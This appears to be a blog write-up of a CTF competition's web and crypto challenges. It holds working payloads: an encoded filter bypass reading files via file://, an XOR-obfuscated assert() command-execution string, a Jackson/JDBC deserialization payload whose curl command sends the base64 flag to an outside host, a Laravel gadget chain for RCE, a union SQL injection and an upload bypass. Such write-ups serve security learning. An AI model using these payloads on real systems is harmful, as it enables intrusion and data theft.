Altm4nz's blog

Web-category slacker

第五空间 (5space) online round

WEB

All I can say is that the challenge quality was a bit better than last year's.

do you know

```php
$poc=$_SERVER['QUERY_STRING'];
if(preg_match("/log|flag|hist|dict|etc|file|write/i" ,$poc)){
    die("no hacker");
}
```

Since $poc is taken from QUERY_STRING, URL encoding obviously bypasses it.
Now look at xxe.php:

```php
if($_SERVER["REMOTE_ADDR"] !== "127.0.0.1"){
    die('show me your identify');
}
```

The idea is clear: go through index.php to reach xxe.php and trigger the XXE.
I was preparing to send a POST request to xxe.php over the gopher protocol; while building it, the POST body contained the word file, which the first layer filters, so I worked around that with urlencode.
Then it suddenly hit me... why not just read the file with the file protocol and be done with it?

```text
http://121.36.64.91/?%75rl=a&url=%66%69%6c%65%3a%2f%2f%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%6d%61%69%6e%2e%70%68%70
```

That showed flag.php, so I read flag.php and got the flag. This was probably unintended, and I couldn't be bothered to keep building the gopher payload.

hate-php

```php
<?php
error_reporting(0);
if(!isset($_GET['code'])){
    highlight_file(__FILE__);
}else{
    $code = $_GET['code'];
    if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) {
        die('You are too good for me');
    }
    $blacklist = get_defined_functions()['internal'];
    foreach ($blacklist as $blackitem) {
        if (preg_match ('/' . $blackitem . '/im', $code)) {
            die('You deserve better');
        }
    }
    assert($code);
}
```

A pile of characters is filtered and then the input goes into assert(); same old trick, just build the payload with XOR.
A script I found online:

```php
<?php
// Builds two URL-encoded strings whose XOR (after PHP decodes the query
// string) equals the target: $l is all 0xff bytes and $r holds each target
// byte XOR 0xff, which is the same as its bitwise NOT.
$l = "";
$r = "";
$argv = str_split("cat flag.php");
for($i=0;$i<count($argv);$i++)
{
    for($j=0;$j<255;$j++)
    {
        $k = chr($j)^chr(255);
        if($k == $argv[$i]){
            $l .= "%ff";
            // dechex() does not zero-pad, so bytes below 0x10 need a leading 0
            if($j<16){
                $r .= "%0" . dechex($j);
                continue;
            }
            $r .= "%" . dechex($j);
            continue;
        }
    }
}
// XOR form of the payload; ~$r on its own yields the same bytes (the NOT form)
echo "($l^$r)\n";
?>
```

Final payload:

```text
http://121.36.74.163/?code=(~%8c%86%8c%8b%9a%92)(~%9c%9e%8b%df%99%93%9e%98%d1%8f%97%8f)
```

zzm's blog

The hint pointed at Jackson.
Related articles I found:
https://www.cnblogs.com/xinzhao/p/11005419.html
https://www.anquanke.com/post/id/203086

Spin up a fake MySQL server on a VPS, install ysoserial, then tweak the payload a bit:

```text
http://121.36.46.83/?query={%22id%22:[%22com.mysql.cj.jdbc.admin.MiniAdmin%22,%20%22jdbc:mysql://134.175.2.73:3306/test?autoDeserialize=true%26queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor%26user=yso_CommonsCollections7_bash%20-c%20curl${IFS}http://134.175.2.73:2333/`cat${IFS}/tmp/flag*|base64`%22]}
```

Because an underscore causes an error, a wildcard is used to read the flag, and curl carries the data out.

Then just base64-decode it.

laravel

Code review turned up a deserialization point; I tried the gadget chains that work on 5.7.28 but none of them did.
So I found a new chain myself:

```php
<?php
namespace Faker{
    class Generator{
        protected $formatters = ['addCollection' => 'system'];
    }
}
namespace Symfony\Component\Routing\Loader\Configurator{
    class ImportConfigurator
    {
        private $parent;
        protected $route;

        public function __construct($parent, $route)
        {
            $this->parent = $parent;
            $this->route = $route;
        }
    }
}

namespace test{
    $a = new \Symfony\Component\Routing\Loader\Configurator\ImportConfigurator(new \Faker\Generator(), "ls");
    echo urlencode(serialize($a));
}
```

RCE achieved.

Meituan Waimai (美团外卖)

Got the source from www.zip.
The first thing I noticed was a familiar file,
/lib/webuploader/0.1.5/server/preview.php
which has an arbitrary file upload. php is banned, so I tried uploading with a php5 extension, only to find that this file had been removed in the live environment. ???
Kept looking: the login page has an injection, but with the WAF in place blind injection is not possible.
Then I found an injection with echoed output in daochu.php.

```text
http://119.3.183.154/daochu.php?type=1&imei=" union select 1,2,hints,4,5,6 from hint #
```

That shows the hint, which gives a directory.
956c110ef9decdd920249f5fed9e4427, and inside is yet another login page. Nested dolls?
In the system under this directory preview.php does exist, so I tried uploading with a php5 extension.
It returned e98a4571cf72b798077d12d6c94629.php

Visiting it told me "get file", so:

```text
http://119.3.183.154/956c110ef9decdd920249f5fed9e4427/lib/webuploader/0.1.5/server/e98a4571cf72b798077d12d6c94629.php?file=/flag
```

Hmm, no idea what this challenge was supposed to test.

crypto

roby

```python
# coding:utf8
# Common modulus attack: the same m was encrypted under one n with two coprime
# exponents, so Bezout coefficients s1*e1 + s2*e2 = 1 give m = c1^s1 * c2^s2 mod n.
import gmpy2
import libnum

n=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  # value not recoverable from the page
c1=0x2f6546062ff19fe6a3155d76ef90410a3cbc07fef5dff8d3d5964174dfcaf9daa003967a29c516657044e87c1cbbf2dba2e158452ca8b7adba5e635915d2925ac4f76312feb3b0c85c3b8722c0e4aedeaec2f2037cc5f676f99b7260c3f83ffbaba86cda0f6a9cd4c70b37296e8f36c3ceaae15b5bf0b290119592ff03427b80055f08c394e5aa6c45bd634c80c59a9f70a92dc70eebec15d4a5e256bf78775e0d3d14f3a0103d9ad8ea6257a0384091f14da59e52581ba2e8ad3adb9747435e9283e8064de21ac41ab2c7b161a3c072b7841d4a594a8b348a923d4cc39f02e05ce95a69c7500c29f6bb415c11e4e0cdb410d0ec2644d6243db38e893c8a3707
c2=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  # value not recoverable from the page
e1=0xf4c1158f
e2=0xf493f7d1
# libnum.xgcd(a, b) returns (x, y, g) with x*a + y*b == g
s1=libnum.xgcd(e1,e2)[0]
s2=libnum.xgcd(e1,e2)[1]

# A negative coefficient is handled by inverting that ciphertext modulo n
if(s1<0):
    s1=-s1
    c1=gmpy2.invert(c1,n)
if(s2<0):
    s2=-s2
    c2=gmpy2.invert(c2,n)
m=libnum.n2s((pow(c1,s1,n)*pow(c2,s2,n)%n))
print(m)
```
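The attack the script above applies, reproduced as an added example that is not part of the original writeup: it runs offline on a constructed toy key (the two primes, the message and the `demo` helper are made up; the exponents are the ones from the challenge script) and uses a pure-Python extended Euclid in place of libnum/gmpy2, so it also shows why a modulus must never be shared between two public exponents.

```python
def egcd(a: int, b: int):
    """Return (g, x, y) with x*a + y*b == g == gcd(a, b)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def common_modulus(n: int, e1: int, c1: int, e2: int, c2: int) -> int:
    """Recover m from c1 = m^e1 mod n and c2 = m^e2 mod n when gcd(e1, e2) == 1."""
    g, s1, s2 = egcd(e1, e2)
    if g != 1:
        raise ValueError("exponents must be coprime")
    # A negative Bezout coefficient means that ciphertext is raised to a
    # negative power, so swap it for its modular inverse (same as the
    # gmpy2.invert branches in the writeup script).
    if s1 < 0:
        s1, c1 = -s1, pow(c1, -1, n)
    if s2 < 0:
        s2, c2 = -s2, pow(c2, -1, n)
    # m^(s1*e1) * m^(s2*e2) = m^(s1*e1 + s2*e2) = m^1 mod n
    return pow(c1, s1, n) * pow(c2, s2, n) % n


# Constructed toy key: two well-known small primes, far too small for real use.
P, Q = 1000000007, 998244353
N = P * Q
E1, E2 = 0xf4c1158f, 0xf493f7d1  # the exponents from the challenge script


def demo(message: bytes = b"flag{t}") -> bytes:
    """Encrypt a constructed message twice under (N, E1) and (N, E2), then recover it."""
    m = int.from_bytes(message, "big")
    if m >= N:
        raise ValueError("message too long for the toy modulus")
    c1, c2 = pow(m, E1, N), pow(m, E2, N)
    recovered = common_modulus(N, E1, c1, E2, c2)
    return recovered.to_bytes((recovered.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    print(demo())  # b'flag{t}'
```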